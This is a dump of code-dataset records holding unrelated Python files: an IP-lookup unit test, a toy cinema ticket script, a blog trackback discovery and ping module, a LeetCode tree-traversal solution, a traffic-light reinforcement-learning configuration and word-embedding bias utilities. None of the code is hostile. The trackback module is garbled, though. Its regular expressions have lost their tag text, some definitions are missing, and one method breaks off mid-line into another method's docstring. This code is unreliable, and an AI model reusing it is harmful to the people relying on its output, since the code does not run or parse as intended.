\"GB\")\r\n\r\n        # Testing an invalid IP\r\n        with self.assertRaises(ValueError):\r\n            invalidString = \"123456\"\r\n            country_code = iptocc.get_country_code(invalidString)\r\n\r\n    def test_convert_ip_string(self):\r\n        # Test ipv6\r\n        ipv6String = \"2001:0db8:0000:0000:0000:ff00:0042:8329\"\r\n        ipv6Object = iptocc.convert_ip_string(ipv6String)\r\n        self.assertEqual(isinstance(ipv6Object, ipaddress.IPv6Address), True)\r\n\r\n        # Test ipv4\r\n        ipv4String = \"127.0.0.1\"\r\n        ipv4Object = iptocc.convert_ip_string(ipv4String)\r\n        self.assertEqual(isinstance(ipv4Object, ipaddress.IPv4Address), True)\r\n\r\n        # Testing an invalid ip parameter\r\n        with self.assertRaises(ValueError):\r\n            invalidParam = 123456\r\n            invalidObject = iptocc.convert_ip_string(invalidParam)\r\n        \r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n","sub_path":"test/test_search_database.py","file_name":"test_search_database.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"446036014","text":"films = {\n    # key:[min age, # of tickets]\n    \"Harry Potter\": [15, 10],\n    \"Guardians\": [14, 0],\n    \"Bourne\": [18, 5],\n    \"Her\": [12, 1],\n    \"Please Like Me\": [14, 5],\n    \"The Tropical Adventures Of Penguini\": [21, 100]\n}\n\nwhile True:\n    # title to capitalise the first letter of each word\n    choice = input(\"What film do you want to watch? 
:\").strip().title()\n if choice in films:\n age = int(input(\"How old are you?: \").strip())\n # Check user age\n if age >= films[choice][0]:\n # Check number of seats\n\n num_seats = films[choice][1]\n\n if num_seats > 0:\n print(\"Enjoy the film!\")\n films[choice][1] = films[choice][1] - 1\n else:\n print(\"The tickets for this movie are sold out :(\")\n else:\n print(\"You are too young to watch that film :(\")\n else:\n print(\"We don't have that film...\")\n","sub_path":"Python_basics/Playground/Cinema Simulator.py","file_name":"Cinema Simulator.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"324124078","text":"from zoundry.base.net.http import ZSimpleTextHTTPRequest\r\nfrom zoundry.base.util.text.textutil import getNoneString\r\nfrom zoundry.base.util.text.textutil import getSafeString\r\nfrom zoundry.base.util.text.unicodeutil import convertToUtf8\r\nfrom zoundry.base.util.types.attrmodel import ZModelWithAttributes\r\nfrom zoundry.base.xhtml.xhtmlutil import extractTitle\r\nimport re\r\n\r\n#===================================================\r\n# Module for sending trackbacks\r\n#===================================================\r\nRDF_NS = u\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" #$NON-NLS-1$\r\nDC_ELEMENTS_NS = u\"http://purl.org/dc/elements/1.1/\" #$NON-NLS-1$\r\n\r\n# Begin RDF regular expressions\r\nRDF_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nRDF_RE = re.compile(RDF_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nRDF_ABOUT_PATTERN = r'.*rdf:about\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nRDF_ABOUT_RE = re.compile(RDF_ABOUT_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_ID_PATTERN = r'.*dc:identifier\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_ID_RE = re.compile(DC_ID_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_TITLE_PATTERN = r'.*dc:title\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_TITLE_RE = re.compile(DC_TITLE_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nTB_PING_PATTERN = r'.*trackback:ping\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nTB_PING_RE = re.compile(TB_PING_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_DESC_PATTERN = r'.*dc:description\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_DESC_RE = re.compile(DC_DESC_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_DATE_PATTERN = r'.*dc:date\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_DATE_RE = re.compile(DC_DATE_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_CREATOR_PATTERN = r'.*dc:creator\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_CREATOR_RE = re.compile(DC_CREATOR_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n# End RDF regular expressions\r\n\r\n# RSS Item regular expressions\r\nITEM_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_RE = re.compile(ITEM_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n\r\nITEM_LINK_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_LINK_RE = re.compile(ITEM_LINK_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nITEM_DESC_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_DESC_RE = re.compile(ITEM_DESC_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n# RSS 1.0\r\nITEM_TB_1_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_TB_2_RE = re.compile(ITEM_TB_2_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n# End RSS Item regular expressions\r\n\r\n# Trackback 
ping response\r\nTB_RESP_ERROR_PATTERN = r'<error[^>]*?>(.*?)</error[^>]*?>' #$NON-NLS-1$\r\nTB_RESP_ERROR_RE = re.compile(TB_RESP_ERROR_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nTB_RESP_MSG_PATTERN = r'<message[^>]*?>(.*?)</message[^>]*?>' #$NON-NLS-1$\r\nTB_RESP_MSG_RE = re.compile(TB_RESP_MSG_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nTB_RESP_TITLE_PATTERN = r'<title[^>]*?>(.*?)</title[^>]*?>' #$NON-NLS-1$\r\nTB_RESP_TITLE_RE = re.compile(TB_RESP_TITLE_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n\r\n# ping back\r\nPB_LINK_TAG_PATTERN = u'(<link rel=\"pingback\" .*?/>)' #$NON-NLS-1$\r\nPB_LINK_TAG_RE = re.compile(PB_LINK_TAG_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE)\r\nPB_HREF_PATTERN = u'(.*href\\s*=\\s*\"?)([^\"^\\s]*)([\"\\s].*>)(.*)' #$NON-NLS-1$\r\nPB_HREF_RE = re.compile(PB_HREF_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE)\r\n\r\n#----------------------------------------------\r\n# Blog post entry trackback meta data\r\n#--------------------------------------------------------------\r\nclass ZTrackbackEntry(ZModelWithAttributes):\r\n\r\n    def __init__(self, pingUrl, entryUrl, title, summary):\r\n        ZModelWithAttributes.__init__(self)\r\n        self.setAttribute(u\"ping\", pingUrl) #$NON-NLS-1$\r\n        self.setAttribute(u\"url\", entryUrl) #$NON-NLS-1$\r\n        self.setAttribute(u\"title\", title) #$NON-NLS-1$\r\n        self.setAttribute(u\"summary\", summary) #$NON-NLS-1$\r\n    # end __init__\r\n\r\n    def getPingUrl(self):\r\n        u\"\"\"\r\n        getPingUrl() -> string\r\n        Returns trackback ping URL.\r\n        \"\"\" #$NON-NLS-1$\r\n        return self.getAttribute(u\"ping\") #$NON-NLS-1$\r\n    # end getPingUrl()\r\n\r\n    def getEntryUrl(self):\r\n        u\"\"\"\r\n        getEntryUrl() -> string\r\n        Returns blog post entry URL.\r\n        \"\"\" #$NON-NLS-1$\r\n        return self.getAttribute(u\"url\") #$NON-NLS-1$\r\n    # end getEntryUrl()\r\n\r\n    def getTitle(self):\r\n        u\"\"\"\r\n        getTitle() -> string\r\n        Returns title of post.\r\n        \"\"\" #$NON-NLS-1$\r\n        return getSafeString(self.getAttribute(u\"title\")) #$NON-NLS-1$\r\n    # end getTitle()\r\n\r\n    def getSummary(self):\r\n        u\"\"\"\r\n        getSummary() -> string\r\n        Returns the optional summary or description.\r\n        \"\"\" #$NON-NLS-1$\r\n        return getSafeString(self.getAttribute(u\"summary\")) #$NON-NLS-1$\r\n    # end getSummary()\r\n\r\n# end ZTrackbackEntry\r\n\r\n#----------------------------------------------\r\n# Auto discover result\r\n#--------------------------------------------------------------\r\nclass ZTrackbackDiscoverResult:\r\n\r\n    def __init__(self, title, entries):\r\n        self. 
title = title\r\n self.entries = entries\r\n # end __init__()\r\n\r\n def getTitle(self):\r\n u\"\"\"\r\n getTitle() -> string\r\n Returns html page title.\r\n \"\"\" #$NON-NLS-1$\r\n return self.title\r\n # end getTitle()\r\n\r\n def getTrackbackEntries(self):\r\n u\"\"\"\r\n getTrackbackEntries() -> list\r\n Returns list of ZTrackbackEntry items.\r\n \"\"\" #$NON-NLS-1$\r\n return self.entries\r\n # end getTrackbackEntries\r\n\r\n# end ZTrackbackDiscoverResult\r\n\r\n\r\n#---------------------------------------------\r\n# Class to auto discover trackback information\r\n#----------------------------------------------\r\nclass ZTrackbackDiscovery:\r\n u\"\"\"ZTrackbackDiscovery discovers trackback information given a site URL.\r\n The discovery is based on either RDF or RSS content in a page.\"\"\" #$NON-NLS-1$\r\n\r\n def discover(self, url):\r\n u\"\"\"discover(string) -> list of IZTrackbackEntry\r\n Retrieves the contents of the given url and discovers (extracts) the trackback\r\n information from either the RDF of RSS Item constructs. This method returns a list\r\n of IZTrackbackEntry objects for each trackback discovered.\"\"\" #$NON-NLS-1$\r\n\r\n trackbackEntryList = []\r\n htmlContent = self._downloadHtmlContent(url)\r\n title = u\"\" #$NON-NLS-1$\r\n if htmlContent:\r\n title = extractTitle(htmlContent)\r\n trackbackEntryList = self._parseContent(url, title, htmlContent)\r\n rval = ZTrackbackDiscoverResult(title, trackbackEntryList)\r\n return rval\r\n # end discover()\r\n\r\n def _parseContent(self, url, title, htmlContent):\r\n trackbackEntryList = []\r\n trackbackEntryList.extend( self._extractRdf(url, title, htmlContent) )\r\n trackbackEntryList.extend( self._extractRssItems(url, title, htmlContent) )\r\n trackbackEntryList.extend( self._extractMsnContent(url, title, htmlContent) )\r\n return trackbackEntryList\r\n # end _parseContent()\r\n\r\n def _extractRdf(self, url, title, htmlContent): #@UnusedVariable\r\n rdfTbList = []\r\n rdfEleList = RDF_RE.findall(htmlContent)\r\n for rdf in rdfEleList:\r\n #rdfAbout = self._extract(RDF_ABOUT_RE,rdf)\r\n rdfId = self._extract(DC_ID_RE,rdf)\r\n rdfTitle = self._extract(DC_TITLE_RE,rdf)\r\n pingUrl = self._extract(TB_PING_RE,rdf)\r\n rdfDesc = self._extract(DC_DESC_RE,rdf)\r\n rdfDate = self._extract(DC_DATE_RE,rdf)\r\n rdfCreator = self._extract(DC_CREATOR_RE,rdf)\r\n if rdfDesc:\r\n temp = rdfDesc.lower()\r\n if temp.startswith(u\" ZTrackbackPingResponse\r\n Pings the track back and returns ZTrackbackPingResponse\"\"\" #$NON-NLS-1$\r\n if getNoneString(pingUrl) is None:\r\n return ZTrackbackPingResponse(False, u\"Trackback ping url is required.\") #$NON-NLS-1$\r\n\r\n if getNoneString(id) is None:\r\n return ZTrackbackPingResponse(False, u\"Trackback Originating Resource ID is required.\") #$NON-NLS-1$\r\n\r\n if getNoneString(url) is None:\r\n return ZTrackbackPingResponse(False, u\"Trackback post url is required.\") #$NON-NLS-1$\r\n\r\n title = convertToUtf8( getSafeString(title) )\r\n blogName = convertToUtf8( getSafeString(blogName))\r\n excerpt = convertToUtf8( getSafeString(excerpt))\r\n\r\n postData = {\r\n u'id': id, #$NON-NLS-1$\r\n u'url': url, #$NON-NLS-1$\r\n u'title': title, #$NON-NLS-1$\r\n u'blog_name': blogName, #$NON-NLS-1$\r\n u'excerpt': excerpt #$NON-NLS-1$\r\n }\r\n\r\n htmlResult = self._sendHttpPostData(pingUrl, postData)\r\n resp = self._parseResponse(htmlResult)\r\n return resp\r\n # end ping\r\n\r\n def _sendHttpPostData(self, pingUrl, postDataMap):\r\n try:\r\n request = ZSimpleTextHTTPRequest(pingUrl)\r\n 
if request.send(postDataMap):\r\n                return request.getResponse()\r\n        except:\r\n            pass\r\n        return None\r\n    # end _sendHttpPostData()\r\n\r\n\r\n    def _parseResponse(self, htmlResult):\r\n        u\"\"\"Parses the trackback response data and returns ZTrackbackPingResponse.\"\"\" #$NON-NLS-1$\r\n        if not htmlResult:\r\n            return ZTrackbackPingResponse(False, u\"Trackback HTTP POST empty response error.\") #$NON-NLS-1$\r\n        bOk = False\r\n        msg = u\"OK\" #$NON-NLS-1$\r\n        fList = TB_RESP_ERROR_RE.findall(htmlResult)\r\n        if fList and len(fList) > 0 and fList[0] and fList[0].strip() == u\"0\": #$NON-NLS-1$\r\n            bOk = True\r\n        elif fList and len(fList) > 0 and fList[0] and fList[0].strip() == u\"1\": #$NON-NLS-1$\r\n            bOk = False\r\n        else:\r\n            msg = u\"Trackback element not found in response\" #$NON-NLS-1$\r\n            fList = TB_RESP_TITLE_RE.findall(htmlResult)\r\n            if fList and len(fList) > 0 and fList[0]:\r\n                msg = u\"Trackback HTTP response error: %s\" % fList[0].strip() #$NON-NLS-1$\r\n            return ZTrackbackPingResponse(False, msg)\r\n\r\n        fList = TB_RESP_MSG_RE.findall(htmlResult)\r\n        if fList and len(fList) > 0 and fList[0]:\r\n            msg = fList[0].strip()\r\n        elif not bOk:\r\n            msg = u\"Trackback response message not available\" #$NON-NLS-1$\r\n\r\n        return ZTrackbackPingResponse(bOk, msg)\r\n    # end _parseResponse()\r\n\r\n# end ZTrackbackPinger()\r\n\r\n# FIXME PJ Support following trackback formats:\r\n# http://www.lifewiki.net/attachments/view/101/2.2\r\n#\r\n# Example HTML TrackBack Link\r\n#\r\n# \r\n\r\n# \r\n#\r\n# Example Atom TrackBack Link\r\n#\r\n# \r\n# ...\r\n# \r\n# ...\r\n# \r\n","sub_path":"src/python/zoundry/blogpub/trackback.py","file_name":"trackback.py","file_ext":"py","file_size_in_byte":15412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"238424773","text":"#\n# @lc app=leetcode.cn id=94 lang=python3\n#\n# [94] Binary Tree Inorder Traversal\n#\n# https://leetcode-cn.com/problems/binary-tree-inorder-traversal/description/\n#\n# algorithms\n# Medium (72.75%)\n# Total Accepted:    262.5K\n# Total Submissions: 357K\n# Testcase Example:  '[1,null,2,3]'\n#\n# Given a binary tree, return its inorder traversal.\n# \n# Example:\n# \n# Input: [1,null,2,3]\n# ⁠ 1\n# ⁠  \\\n# ⁠   2\n# ⁠  /\n# ⁠ 3\n# \n# Output: [1,3,2]\n# \n# Follow up: The recursive solution is trivial; could you do it iteratively?\n# \n#\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\ndef inorder(root, result):\n    if not root:\n        return\n    inorder(root.left, result)\n    result.append(root.val)\n    inorder(root.right, result)\n\nclass Solution:\n    def inorderTraversal(self, root: TreeNode) -> List[int]:\n        result = []\n        inorder(root, result)\n        return result\n","sub_path":"Week_02/94.binary-tree-inorder-traversal.py","file_name":"94.binary-tree-inorder-traversal.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"432557033","text":"from ray.rllib.agents.ppo.ppo_policy import PPOTFPolicy\nfrom flow.envs.multiagent import MultiTrafficLightGridPOEnv\nfrom flow.networks import TrafficLightGridNetwork\nfrom flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams\nfrom flow.core.params import InitialConfig\nfrom flow.core.params import TrafficLightParams\n\nfrom flow.core.params import InFlows, SumoCarFollowingParams, VehicleParams\nfrom flow.controllers import SimCarFollowingController, GridRouter\nfrom ray.tune.registry import register_env\nfrom flow.utils.registry import make_create_env\n\n# the 
TestEnv environment is used to simply simulate the network\nfrom flow.envs import TestEnv\n# the Experiment class is used for running simulations\nfrom flow.core.experiment import Experiment\n# the base network class\nfrom flow.networks import Network\n# all other imports are standard\nfrom flow.core.params import VehicleParams, NetParams, InitialConfig, EnvParams, \\\n SumoParams, SumoCarFollowingParams, InFlows, SumoLaneChangeParams, TrafficLightParams\n#from flow.envs.ring.accel import AccelEnv, ADDITIONAL_ENV_PARAMS\nfrom tl_custom_env_ma import ADDITIONAL_ENV_PARAMS,MultiTrafficLightGridPOEnv\n\nfrom flow.controllers import SimLaneChangeController, GridRouter\n\n# define parameters\nfrom flow.controllers.rlcontroller import RLController\nfrom flow.controllers.lane_change_controllers import SimLaneChangeController\nfrom flow.controllers.routing_controllers import ContinuousRouter\nfrom copy import deepcopy\nfrom gym.spaces.box import Box\nfrom flow.core import rewards\nfrom flow.envs.base import Env\nfrom tl_net_ma import offRampGrid,initial_config,net_params\n\nimport logging\nimport datetime\nimport numpy as np\nimport time\nimport os\nfrom flow.core.util import emission_to_csv\nfrom flow.utils.registry import make_create_env\n\n# We firstly test on a single agent scenario\ndef para_produce_rl(HORIZON=3000):\n # Create default environment parameters\n env_params = EnvParams()\n\n # Vehicle definition\n vehicles = VehicleParams()\n num_vehicles = 1\n vehicles.add(\n veh_id=\"human\",\n routing_controller=(GridRouter, {}),\n lane_change_controller=(SimLaneChangeController, {}),\n car_following_params=SumoCarFollowingParams(\n min_gap=2.5,\n decel=7.5, # avoid collisions at emergency stops\n ),\n lane_change_params=SumoLaneChangeParams(\n lane_change_mode=1621,\n ),\n num_vehicles=num_vehicles)\n\n # whether to allow turns at intersections\n ALLOW_TURNS = False\n \n # initialize traffic lights, used when you want define your own traffic lights\n tl_logic = TrafficLightParams(baseline=False) # To see static traffic lights in action, the `TrafficLightParams` object should be instantiated with `baseline=False`\n\n # when use off_ramp_grid.net.xml file, you should use a phase state example as \"GGGgrrrrGGGgrrrr\"\n # when use off_ramp_grid_turn.net.xml file, you should use a phase state example as \"GGGggrrrrrGGGggrrrrr\"\n if ALLOW_TURNS:\n phases = [{\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n # for actuated traffic lights, you can add these optional values below\n # \"maxGap\": int, describes the maximum time gap between successive vehicle sthat will cause the current phase to be prolonged\n # \"detectorGap\": int, determines the time distance between the (automatically generated) detector and the stop line in seconds\n # \"showDetectors\": bool, toggles whether or not detectors are shown in sumo-gui\n \"state\": \"GGGggrrrrrGGGggrrrrr\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"yyyyyrrrrryyyyyrrrrr\"\n }, {\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"rrrrrGGGggrrrrrGGGgg\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"rrrrryyyyyrrrrryyyyy\"\n }]\n tl_logic.add(\"center0\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center1\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center2\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n 
tl_logic.add(\"center3\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n else:\n phases = [{\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n # for actuated traffic lights, you can add these optional values below\n # \"maxGap\": int, describes the maximum time gap between successive vehicle sthat will cause the current phase to be prolonged\n # \"detectorGap\": int, determines the time distance between the (automatically generated) detector and the stop line in seconds\n # \"showDetectors\": bool, toggles whether or not detectors are shown in sumo-gui\n \"state\": \"GGGgrrrrGGGgrrrr\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"yyyyrrrryyyyrrrr\"\n }, {\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"rrrrGGGgrrrrGGGg\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"rrrryyyyrrrryyyy\"\n }]\n\n # THIS IS A BUG THAT I DON'T KNOW WHY IT HAPPENS!!!!!!\n phase0 = [{\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"GGrrGGrrGGrrGGrr\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"yyrryyrryyrryyrr\"\n }, {\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"rrGGrrGGrrGGrrGG\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"rryyrryyrryyrryy\"\n }]\n\n tl_logic.add(\"center0\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center1\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center2\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center3\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n \n flow_params = dict(\n exp_tag='offramp_multiagent_inflow_1.0_speed_20',\n env_name=MultiTrafficLightGridPOEnv,\n network=offRampGrid,\n simulator='traci',\n sim=SumoParams(\n sim_step=0.1,\n render=False,\n #emission_path='./data',\n restart_instance=True,\n ),\n env=EnvParams(\n horizon=3000, additional_params=ADDITIONAL_ENV_PARAMS.copy(),\n ),\n net=net_params,\n veh=vehicles,\n initial=initial_config,\n # used when you define your own traffic lights\n #tls=tl_logic,\n )\n #flow_params['env'].horizon = HORIZON\n return flow_params\n\nflow_params = para_produce_rl()\n\nclass Experiment:\n def __init__(self, flow_params=flow_params):\n \"\"\"Instantiate Experiment.\"\"\"\n # Get the env name and a creator for the environment.\n self.create_env, self.env_name = make_create_env(flow_params)\n\n # Create the environment.\n self.env = self.create_env()\n self.flow_params = flow_params\n\n # Register as rllib env\n register_env(self.env_name,self.create_env)\n\n self.obs_space = self.env.observation_space\n self.act_space = self.env.action_space\n\n logging.info(\" Starting experiment {} at {}\".format(\n self.env.network.name, str(datetime.datetime.utcnow())))\n\n logging.info(\"Initializing environment.\")\n\n","sub_path":"project_ma/tl_env_ma.py","file_name":"tl_env_ma.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"156716829","text":"import math\n\nimport gensim\nimport matplotlib.pylab as plt\nimport numpy as np\nimport pandas as pd\nfrom six import string_types\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import 
accuracy_score\n\n\nWORD_EMBEDDING_MODEL_TYPES = (gensim.models.keyedvectors.KeyedVectors,\n gensim.models.keyedvectors.BaseKeyedVectors,\n gensim.models.fasttext.FastText,\n gensim.models.word2vec.Word2Vec,\n gensim.models.base_any2vec.BaseWordEmbeddingsModel,) # pylint: disable=line-too-long\n\n\ndef round_to_extreme(value, digits=2):\n place = 10**digits\n new_value = math.ceil(abs(value) * place) / place\n if value < 0:\n new_value = -new_value\n return new_value\n\n\ndef normalize(v):\n \"\"\"Normalize a 1-D vector.\"\"\"\n if v.ndim != 1:\n raise ValueError('v should be 1-D, {}-D was given'.format(\n v.ndim))\n norm = np.linalg.norm(v)\n if norm == 0:\n return v\n return v / norm\n\n\ndef cosine_similarity(v, u):\n \"\"\"Calculate the cosine similarity between two vectors.\"\"\"\n v_norm = np.linalg.norm(v)\n u_norm = np.linalg.norm(u)\n similarity = v @ u / (v_norm * u_norm)\n return similarity\n\n\ndef project_vector(v, u):\n \"\"\"Projecting the vector v onto direction u.\"\"\"\n normalize_u = normalize(u)\n return (v @ normalize_u) * normalize_u\n\n\ndef reject_vector(v, u):\n \"\"\"Rejecting the vector v onto direction u.\"\"\"\n return v - project_vector(v, u)\n\n\ndef project_reject_vector(v, u):\n \"\"\"Projecting and rejecting the vector v onto direction u.\"\"\"\n projected_vector = project_vector(v, u)\n rejected_vector = v - projected_vector\n return projected_vector, rejected_vector\n\n\ndef project_params(u, v):\n \"\"\"Projecting and rejecting the vector v onto direction u with scalar.\"\"\"\n normalize_u = normalize(u)\n projection = (v @ normalize_u)\n projected_vector = projection * normalize_u\n rejected_vector = v - projected_vector\n return projection, projected_vector, rejected_vector\n\n\ndef cosine_similarities_by_words(model, word, words):\n \"\"\"Compute cosine similarities between a word and a set of other words.\"\"\"\n\n assert isinstance(word, string_types), \\\n 'The arguemnt `word` should be a string.'\n assert not isinstance(words, string_types), \\\n 'The argument `words` should not be a string.'\n\n vec = model[word]\n vecs = [model[w] for w in words]\n return model.cosine_similarities(vec, vecs)\n\n\ndef update_word_vector(model, word, new_vector):\n model.vectors[model.vocab[word].index] = new_vector\n if model.vectors_norm is not None:\n model.vectors_norm[model.vocab[word].index] = normalize(new_vector)\n\n\ndef generate_one_word_forms(word):\n return [word.lower(), word.upper(), word.title()]\n\n\ndef generate_words_forms(words):\n return sum([generate_one_word_forms(word) for word in words], [])\n\n\ndef take_two_sides_extreme_sorted(df, n_extreme,\n part_column=None,\n head_value='',\n tail_value=''):\n head_df = df.head(n_extreme)[:]\n tail_df = df.tail(n_extreme)[:]\n\n if part_column is not None:\n head_df[part_column] = head_value\n tail_df[part_column] = tail_value\n\n return (pd.concat([head_df, tail_df])\n .drop_duplicates()\n .reset_index(drop=True))\n\n\ndef assert_gensim_keyed_vectors(model):\n if not isinstance(model, WORD_EMBEDDING_MODEL_TYPES):\n type_names = (model_type.__name__\n for model_type in WORD_EMBEDDING_MODEL_TYPES)\n raise TypeError('model should be on of the types'\n ' ({}), not {}.'\n .format(', '.join(type_names),\n type(model)))\n\n\ndef most_similar(model, positive=None, negative=None,\n topn=10, restrict_vocab=None, indexer=None,\n unrestricted=True):\n \"\"\"\n Find the top-N most similar words.\n\n Positive words contribute positively towards the similarity,\n negative words negatively.\n\n This function 
computes cosine similarity between a simple mean\n of the projection weight vectors of the given words and\n the vectors for each word in the model.\n The function corresponds to the `word-analogy` and `distance`\n scripts in the original word2vec implementation.\n\n Based on Gensim implementation.\n\n :param model: Word embedding model of ``gensim.model.KeyedVectors``.\n :param list positive: List of words that contribute positively.\n :param list negative: List of words that contribute negatively.\n :param int topn: Number of top-N similar words to return.\n :param int restrict_vocab: Optional integer which limits the\n range of vectors\n which are searched for most-similar values.\n For example, restrict_vocab=10000 would\n only check the first 10000 word vectors\n in the vocabulary order. (This may be\n meaningful if you've sorted the vocabulary\n by descending frequency.)\n :param bool unrestricted: Whether to restricted the most\n similar words to be not from\n the positive or negative word list.\n :return: Sequence of (word, similarity).\n \"\"\"\n if topn is not None and topn < 1:\n return []\n\n if positive is None:\n positive = []\n if negative is None:\n negative = []\n\n model.init_sims()\n\n if (isinstance(positive, string_types)\n and not negative):\n # allow calls like most_similar('dog'),\n # as a shorthand for most_similar(['dog'])\n positive = [positive]\n\n if ((isinstance(positive, string_types) and negative)\n or (isinstance(negative, string_types) and positive)):\n raise ValueError('If positives and negatives are given, '\n 'both should be lists!')\n\n # add weights for each word, if not already present;\n # default to 1.0 for positive and -1.0 for negative words\n positive = [\n (word, 1.0) if isinstance(word, string_types + (np.ndarray,))\n else word\n for word in positive\n ]\n negative = [\n (word, -1.0) if isinstance(word, string_types + (np.ndarray,))\n else word\n for word in negative\n ]\n\n # compute the weighted average of all words\n all_words, mean = set(), []\n for word, weight in positive + negative:\n if isinstance(word, np.ndarray):\n mean.append(weight * word)\n else:\n mean.append(weight * model.word_vec(word, use_norm=True))\n if word in model.vocab:\n all_words.add(model.vocab[word].index)\n\n if not mean:\n raise ValueError(\"Cannot compute similarity with no input.\")\n mean = gensim.matutils.unitvec(np.array(mean)\n .mean(axis=0)).astype(float)\n\n if indexer is not None:\n return indexer.most_similar(mean, topn)\n\n limited = (model.vectors_norm if restrict_vocab is None\n else model.vectors_norm[:restrict_vocab])\n dists = limited @ mean\n\n if topn is None:\n return dists\n\n best = gensim.matutils.argsort(dists,\n topn=topn + len(all_words),\n reverse=True)\n\n # if not unrestricted, then ignore (don't return)\n # words from the input\n result = [(model.index2word[sim], float(dists[sim]))\n for sim in best\n if unrestricted or sim not in all_words]\n\n return result[:topn]\n\n\ndef get_seed_vector(seed, bias_word_embedding):\n\n if seed == 'direction':\n positive_end = bias_word_embedding.positive_end\n negative_end = bias_word_embedding.negative_end\n bias_word_embedding._is_direction_identified() # pylint: disable=protected-access\n seed_vector = bias_word_embedding.direction\n else:\n if seed == 'ends':\n positive_end = bias_word_embedding.positive_end\n negative_end = bias_word_embedding.negative_end\n\n else:\n positive_end, negative_end = seed\n\n seed_vector = normalize(bias_word_embedding.model[positive_end]\n - 
